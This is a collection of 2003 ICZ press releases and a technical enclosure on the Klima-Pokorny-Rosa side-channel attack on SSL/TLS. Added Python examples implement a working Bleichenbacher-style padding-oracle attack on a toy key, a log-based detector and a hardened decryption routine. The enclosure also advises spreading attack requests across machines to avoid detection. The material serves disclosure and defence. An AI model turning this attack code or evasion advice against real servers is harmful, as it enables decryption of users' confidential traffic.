Klima-Pokorny-Rosa attack
(1) Press release ICZ a.s., March 18, 2003
(2) Technical enclosure of the press release
(3) Press release ICZ a.s., March 21, 2003
http://www.i.cz/en/onas/tisk7.html
Press Release, Prague, 18.3.2003
Prague, March 18, 2003. The leading Czech cryptologists Vlastimil Klíma
and Tomáš Rosa, both working for ICZ a. s., together with their colleague
Ondřej Pokorný, have discovered a major security flaw in encrypted Internet
communication and have immediately proposed a fix for it.
The weakness they identified makes it possible to attack the SSL/TLS (Secure
Sockets Layer and Transport Layer Security) protocols, which provide the
cryptographic protection for the majority of electronic transactions, such as
on-line purchases and e-banking, and in some cases for the secure transmission
of e-mail as well.
The attack described by the Czech team breaks this protection completely and
decrypts the protected communication. For clients of applications relying on
SSL/TLS this means that an attacker can recover their credit card numbers,
sensitive details of their bank accounts, and confidential data from their
e-mail.
Client and provider security
In every transmission protected by SSL/TLS there is exactly one party referred
to as the "server" (typically a service provider, such as an e-shop, an e-bank,
or the server hosting an e-mail box) and exactly one party referred to as the
"client" (typically a buyer, an account holder, or the recipient of incoming
e-mail).
The aim of the attack is to decrypt the encrypted communication between the
client and the server. It is based on what are known as "side channels" (a
recent trend in cryptanalysis): the attacker extracts sensitive information
from the service provider (the server) without any involvement of the user
(the client). The information is obtained piece by piece, in the background of
what look like ordinary connections between the attacker and the server, and
is combined by a mathematical algorithm. Because the client plays no part in
it, there is nothing users can do to raise their level of protection; urgent
attention is required instead from the administrators of servers on which the
flaw may be present. The ICZ cryptologists found that, in a randomly selected
sample of several hundred Internet servers using these protocols, as many as
two thirds were vulnerable to the attack.
So that service providers can eliminate the flaw by applying a security patch,
the Czech cryptologists propose several countermeasures in their report, all of
them fully compatible with the client applications in use today. Clients will
therefore encounter no difficulties when servers move to a corrected SSL/TLS
implementation.
Since the flaw concerns the most widely used protocols for protecting
information transmitted over the Internet, its identification, and in
particular the detailed methodology for removing it, is another significant
Czech contribution to Internet security.
For further details see the cryptologic research report at http://eprint.iacr.org/2003/052/
or at ICZ web site at http://www.i.cz.
Technical enclosure:
What exactly does an attacker do?
Typically, the attacker's primary goal is to decrypt intercepted confidential
communication between a client and a server, so we have chosen the following
scenario to show what the discovery means in practice.
In the first step, the attacker intercepts and stores the encrypted
communication between the client and the server. Given the variety of media
over which Internet traffic travels, including wireless links, interception is
generally regarded as perhaps not easy for an amateur but entirely feasible
for an experienced attacker.
In the second step, the attacker uses a mathematical algorithm to derive his
own requests from the intercepted encrypted transaction. Just like an
"ordinary" client, he sends these requests to the server on which the
transaction took place. The server answers each of them, and every answer
gives the attacker a small piece of "side information". By combining a great
many such pieces, the attacker gathers enough data to compute the premaster
secret of the intercepted connection, the value from which all of its
symmetric keys are derived, and then simply decrypts the stored communication.
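What the second step looks like in code, as an added illustration and not code from the ICZ report: a Bleichenbacher-style adaptive chosen-ciphertext attack against a toy RSA/PKCS#1 v1.5 decryption oracle. Assumptions: the oracle reveals only whether the decrypted block begins with the bytes 00 02 (the real side channel was the server's handling of the version bytes inside the premaster secret, which is harder to hit and is why the real attack needs far more requests), the key is a 150-bit toy built from two Mersenne primes, and the names LeakyServer, recover_plaintext and demo are mine.

```python
"""Added example (not ICZ's code): adaptive chosen-ciphertext attack on a toy
RSA/PKCS#1 v1.5 oracle, following Bleichenbacher (CRYPTO '98), of which the
Klima-Pokorny-Rosa attack is a variant. Assumed simplification: the oracle
answers only "does the decrypted block start with 00 02?"."""
import secrets

# Toy key from two Mersenne primes so the demo runs in seconds (a real server
# key is 1024 bits or more; the request counts in the text refer to that size).
P = (1 << 61) - 1
Q = (1 << 89) - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # modular inverse, Python 3.8+
K = (N.bit_length() + 7) // 8          # modulus length in bytes (19 here)
B = 1 << (8 * (K - 2))                 # a conforming block, as an integer, lies in [2B, 3B)


def pkcs1_pad(msg: bytes) -> int:
    """EME-PKCS1-v1_5: 00 02 || at least 8 nonzero random bytes || 00 || msg."""
    pad_len = K - 3 - len(msg)
    if pad_len < 8:
        raise ValueError("message too long for this modulus")
    pad = bytes(1 + secrets.randbelow(255) for _ in range(pad_len))
    return int.from_bytes(b"\x00\x02" + pad + b"\x00" + msg, "big")


def pkcs1_unpad(m: int) -> bytes:
    block = m.to_bytes(K, "big")
    if block[:2] != b"\x00\x02":
        raise ValueError("not PKCS#1 v1.5 conforming")
    return block[block.index(b"\x00", 2) + 1:]


class LeakyServer:
    """All the attacker learns per request is whether the decrypted block starts
    with 00 02. A real server leaked it through a distinguishable alert or
    timing; here it is a return value, and the counter plays the role of the
    request count discussed in the text."""

    def __init__(self) -> None:
        self.queries = 0

    def conforming(self, c: int) -> bool:
        self.queries += 1
        return 2 * B <= pow(c, D, N) < 3 * B


def _ceil_div(a: int, b: int) -> int:
    return -(-a // b)


def _merge(intervals):
    out = []
    for lo, hi in sorted(intervals):
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out


def recover_plaintext(server: LeakyServer, c0: int) -> int:
    """Bleichenbacher steps 2-4. Step 1 (blinding) is skipped: c0 is a genuine
    ciphertext, so its plaintext is already conforming."""
    def ask(s: int) -> bool:
        return server.conforming(c0 * pow(s, E, N) % N)

    intervals = [(2 * B, 3 * B - 1)]
    s = _ceil_div(N, 3 * B)
    while not ask(s):                       # step 2a: smallest conforming multiplier
        s += 1
    while True:
        new = []                            # step 3: intersect with every r-th slice
        for a, b in intervals:
            for r in range(_ceil_div(a * s - 3 * B + 1, N), (b * s - 2 * B) // N + 1):
                lo = max(a, _ceil_div(2 * B + r * N, s))
                hi = min(b, (3 * B - 1 + r * N) // s)
                if lo <= hi:
                    new.append((lo, hi))
        intervals = _merge(new)
        if len(intervals) == 1 and intervals[0][0] == intervals[0][1]:
            return intervals[0][0]          # step 4: a single candidate remains
        if len(intervals) > 1:              # step 2b: several intervals, scan s upward
            s += 1
            while not ask(s):
                s += 1
            continue
        a, b = intervals[0]                 # step 2c: one interval, choose r so it halves
        r = _ceil_div(2 * (b * s - 2 * B), N)
        while True:
            hit = None
            for t in range(_ceil_div(2 * B + r * N, b), (3 * B - 1 + r * N) // a + 1):
                if ask(t):
                    hit = t
                    break
            if hit is not None:
                s = hit
                break
            r += 1


def demo(premaster: bytes = b"\x03\x01" + b"secret") -> tuple:
    """Encrypt a toy premaster secret, then recover it from the oracle alone.
    Returns (recovered premaster secret, number of requests used)."""
    server = LeakyServer()
    c0 = pow(pkcs1_pad(premaster), E, N)
    return pkcs1_unpad(recover_plaintext(server, c0)), server.queries


if __name__ == "__main__":
    pms, n_queries = demo()
    print(f"recovered {pms!r} after {n_queries} requests")
```

With this toy key and simplified oracle the run takes on the order of tens of thousands of requests and a few seconds; the 13.34 million requests quoted further down are for a 1024-bit key and the stricter real oracle, but the loop is the same: one request, one bit of side information, repeat.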
How difficult is an attack?
Apart from intercepting an encrypted transaction, the attack places no special
demands on the attacker's computers or other equipment; a standard office
computer with a fast and stable Internet connection is enough. What makes it
somewhat difficult is only the time the second step takes, which depends on
the number of requests the attacker must send and receive answers to.
In half of the cases, a typical Internet server with a 1024-bit RSA key
succumbs after fewer than 13.34 million requests. Our test environment
sustained 67.7 requests per second, so every second attack would finish within
about 55 hours; the fastest attack in our tests took only 14 hours and 23
minutes.
In practice, an attacker is more likely to spread this load over time and
across machines to reduce the risk of detection. All he needs is to obtain the
required number of answers from the server, so the attack need not run
continuously or from a single location: it can be split into arbitrarily long
intervals spread over an arbitrarily long period and launched from any number
of computers. The only limiting factor is the server, which has to answer the
requests from all of them. Spread out like this, the attack takes considerably
longer, but given the validity period of a credit card, an attacker can afford
to wait months for a card number to be decrypted.
Practical vulnerability and countermeasures
Given what the attack is used for, any server found to be vulnerable must be
regarded as a fairly serious security threat. On the other hand, there is no
need to panic over every electronic transaction: an administrator of an
attacked server who has the necessary experience and tools should be able to
recognize an attack of this kind and stop it by blocking the source it comes
from. Against a sophisticated distributed attack, it is advisable to revoke the
server's current RSA key and generate a new one; the answers the attacker has
collected so far are tied to the old key, so this prevents him from completing
the attack. It should be stressed, however, that the risk of a successful
attack is very high for poorly administered servers, so server administration
deserves increased attention until the necessary security patches are
available.
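The kind of check such an administrator could run, as an added example that is not part of the original enclosure: the attack needs millions of handshakes against one server key that all fail at the RSA key exchange, so counting failures per source catches the single-machine version, and counting them across all sources catches the distributed version that stays under any per-source threshold. The log format ("<unix time> src=<ip> event=<name>"), the thresholds and the sample log are constructed assumptions; adapt the parser to your own server's handshake-failure records.

```python
"""Added example (not ICZ's code): sliding-window detection of the handshake
failure pattern this attack produces. Log format and thresholds are assumed."""
import re
from collections import defaultdict, deque

LINE = re.compile(r"^(?P<ts>\d+) src=(?P<src>\S+) event=(?P<event>\S+)")


def scan(lines, window=60, per_source=200, aggregate=1000):
    """Return the sources that exceeded `per_source` handshake failures within
    any `window` seconds, and whether failures from all sources together
    exceeded `aggregate` in a window (the signal for a distributed attack)."""
    events = []
    for line in lines:
        m = LINE.match(line)
        if m and m["event"] == "handshake_failure":
            events.append((int(m["ts"]), m["src"]))
    events.sort()                                   # logs need not be in order
    recent = defaultdict(deque)                     # timestamps per source
    recent_all = deque()                            # timestamps, all sources
    flagged, aggregate_hit = set(), False
    for ts, src in events:
        for dq in (recent[src], recent_all):
            dq.append(ts)
            while dq[0] < ts - window:              # drop what fell out of the window
                dq.popleft()
        if len(recent[src]) > per_source:
            flagged.add(src)
        if len(recent_all) > aggregate:
            aggregate_hit = True
    return {"flagged": sorted(flagged), "aggregate_hit": aggregate_hit,
            "failures": len(events)}


def constructed_log():
    """Synthetic log (constructed): one noisy client with 300 failures in 60 s,
    a distributed attack from 50 hosts with 25 failures each, and some noise."""
    lines = [f"{1000 + i // 5} src=10.0.0.5 event=handshake_failure" for i in range(300)]
    lines += [f"{1000 + i} src=10.1.{j}.1 event=handshake_failure"
              for j in range(50) for i in range(25)]
    lines += ["1010 src=192.0.2.9 event=handshake_ok",
              "1020 src=192.0.2.9 event=handshake_failure"]
    return lines


if __name__ == "__main__":
    print(scan(constructed_log()))
```

On the constructed log only 10.0.0.5 trips the per-source threshold, while the 50 distributed hosts, at 25 failures each, are invisible to it and show up only in the aggregate count; that aggregate is also the figure to compare against the request budget of the attack when deciding whether to re-key.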
The countermeasures above are administrative and technical, and should suffice
until the countermeasures proposed by the cryptologists are adopted. Those are
very easy to apply and highly effective; they are described in the authors'
technical report and consist of updating the server software.
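What that software update changes, as an added example that is neither OpenSSL's nor ICZ's code: the server-side handling of the decrypted ClientKeyExchange block. leaky_unwrap is the shape the attack needs (a block whose padding is fine but whose version bytes are wrong gets a different reaction from one whose padding is bad); hardened_unwrap follows the approach of the OpenSSL fix and of the later TLS specifications, substituting a random premaster secret on any failure so that every outcome looks the same to the peer. The RSA decryption itself is left out because the leak is in what happens afterwards; the function names and the sample blocks are mine.

```python
"""Added example (not OpenSSL's or ICZ's code): leaky versus hardened handling
of the decrypted premaster-secret block. Sample blocks are constructed."""
import hmac
import secrets

PMS_LEN = 48                      # premaster secret: 2 version bytes + 46 random bytes
CLIENT_VERSION = b"\x03\x01"      # TLS 1.0, as offered in the ClientHello


class BadPadding(Exception):
    pass


class BadVersion(Exception):
    pass


def parse_pkcs1(block: bytes):
    """Payload of an EME-PKCS1-v1_5 block, or None if malformed."""
    if len(block) < 11 or block[:2] != b"\x00\x02":
        return None
    sep = block.find(b"\x00", 2)
    if sep < 10:                  # at least 8 nonzero padding bytes required
        return None
    return block[sep + 1:]


def leaky_unwrap(block: bytes, client_version: bytes) -> bytes:
    """Vulnerable shape: three outcomes, each visible to the peer."""
    pms = parse_pkcs1(block)
    if pms is None or len(pms) != PMS_LEN:
        raise BadPadding()                  # alert 1
    if pms[:2] != client_version:
        raise BadVersion()                  # alert 2: the side channel this attack uses
    return pms


def hardened_unwrap(block: bytes, client_version: bytes) -> bytes:
    """Fixed shape: draw a random premaster secret unconditionally and use it
    whenever any check fails. The handshake then always proceeds to Finished
    and fails there with the same alert, so the peer learns nothing about
    padding or version. (Real code must also parse in constant time, which this
    demo does not attempt.)"""
    fallback = secrets.token_bytes(PMS_LEN)
    pms = parse_pkcs1(block)
    ok = pms is not None and len(pms) == PMS_LEN
    ok = ok and hmac.compare_digest(pms[:2], client_version)
    return pms if ok else fallback


def attacker_view(unwrap, block: bytes) -> str:
    """What a peer observes for one crafted ciphertext."""
    try:
        unwrap(block, CLIENT_VERSION)
        return "proceeds"
    except BadPadding:
        return "bad padding"
    except BadVersion:
        return "bad version"


# Constructed blocks for a 128-byte (1024-bit) modulus: 2 + 77 + 1 + 48 bytes.
_PAD = b"\x00\x02" + b"\x55" * 77 + b"\x00"
GOOD_BLOCK = _PAD + CLIENT_VERSION + b"\x11" * 46
WRONG_VERSION_BLOCK = _PAD + b"\x02\x00" + b"\x11" * 46
BAD_PADDING_BLOCK = b"\x00\x01" + GOOD_BLOCK[2:]


def compare() -> dict:
    """Observable outcomes for the three blocks under both implementations."""
    blocks = [BAD_PADDING_BLOCK, WRONG_VERSION_BLOCK, GOOD_BLOCK]
    return {"leaky": [attacker_view(leaky_unwrap, b) for b in blocks],
            "hardened": [attacker_view(hardened_unwrap, b) for b in blocks]}


if __name__ == "__main__":
    print(compare())
```

The leaky implementation lets the peer sort crafted ciphertexts into "bad padding", "bad version" and "proceeds"; the hardened one answers "proceeds" for all three, and the eventual Finished failure is identical in every case, which is exactly the side information the attack can no longer obtain.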
http://www.i.cz/en/onas/tisk8.html
Press Release, Prague, 21.3.2003
The OpenSSL group, which produces the most widely used software implementing
the SSL/TLS protocols, has released a patch fixing a weakness that allowed a
successful attack on the most widely used method of encrypting communication
on the Internet.
The hole was discovered several days ago by the leading Czech cryptologists
Vlastimil Klíma and Tomáš Rosa, both working for ICZ a. s., and their colleague
Ondřej Pokorný, who also proposed a method of protection.
A successful attack on a server with this weakness would compromise the
security of data, on-line purchases, electronic banking, and in certain cases
secured e-mail transmission. The cryptologists say that programming this type
of attack poses no great problem for experienced hackers and that roughly two
thirds of SSL/TLS servers on the Internet have the weakness.
Administrators of SSL/TLS servers can now download this publicly available
patch, which stops attackers from exploiting the weakness. Patches have also
been released for the OpenBSD and FreeBSD operating systems, which are freely
available like Linux but more security-oriented.
Administrators of banking, commercial and other SSL/TLS servers who cannot use
these patches (because they run different software, for example) should first
study the countermeasures recommended by the cryptologists or follow the
administrative and technical instructions available at the addresses below.
More details:
First press release with technical annex: http://www.i.cz/onas/tisk14.html
OpenSSL homepage: http://www.openssl.org/news/secadv_20030319.txt
OpenSSL patch: http://www.openssl.org/source/repos.html
OpenBSD homepage: http://www.openbsd.org/
OpenBSD patch: http://www.openbsd.org/kpr
FreeBSD homepage: http://www.freebsd.org/
FreeBSD patch: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:06.openssl.asc
Research report: http://eprint.iacr.org/2003/052/
Czech Press Agency ČTK, March 23
Czech television ČT1, News, April 21, 19:15
Radio Praha ČRo 7, March 23
TV Markíza
Hospodářské noviny, March 24, p. 23
České noviny, April 22
Právo, April 22, p. 3
etc.
March 25, David Wagner, cryptologist, University of California, Berkeley:
......But then, the recent Klima-Pokorny-Rosa paper shows how even just a tiny crack can lead to subtle, totally unexpected attacks. Who would have thought that SSL's version rollback check (two bytes in the input to the modular exponentiation) could enable such a devastating attack? Not me. ......
http://www.openssl.org/news/secadv_20030319.txt
http://www.theregister.co.uk/content/55/29868.html
http://www.securityfocus.com/advisories/5151
http://linuxtoday.com/security/
http://www.bsdtoday.com/2003/March/Security804.html
http://sources.redhat.com/ml/cygwin-announce/2003-03/msg00030.html
http://www.security.nnov.ru/search/document.asp?docid=4245
http://www.apacheweek.com/issues/03-03-21
http://www.help-desk.ca/
http://www.krypta.cz/articles.php?ID=247
http://lists.netsys.com/pipermail/full-disclosure/2003-March/004570.html
http://www.twm.cz/
http://www.iss.net/security_center/static/11586.php
http://www.root.cz/clanek/1561
http://www.linuxsecurity.com/advisories/engarde_advisory-3009.html
http://www.swnet.cz/index.php?ID=18877
http://pes.eunet.cz/clanky/2003/03/29218_0_0_0.html
http://www.ipsec.pl/
http://www.altlinux.com/index.php?module=sisyphus&package=openssl
http://www.netsys.com/cgi-bin/displaynews?a=530
http://www.deadly.org/
http://openwiki.com/ow.asp?BSD%2FAggregation
http://www.uinc.ru/scripts/news/news.pl?list=0
http://neworder.box.sk/showme.php3?id=7804
http://telebot.dk/security/all_exploits.asp
http://www.zive.cz/h/Uzivatel/Ar.asp?ARI=109956&CAI=2114
http://www.ceskenoviny.cz/view-id.php4?id=20030323E01270
http://www.technet.cz/zprava.html?zprava=21861
http://www.sme.sk/clanok.asp?vyd=20030324&cl=850380
http://www.einstein.cz/aktuality/?id=61
http://www.inside.cz/index.php?ID=383
http://www.svetsiti.cz/
http://www.reboot.cz/info.phtml
http://www.istrategie.cz/detail.htm?id=35772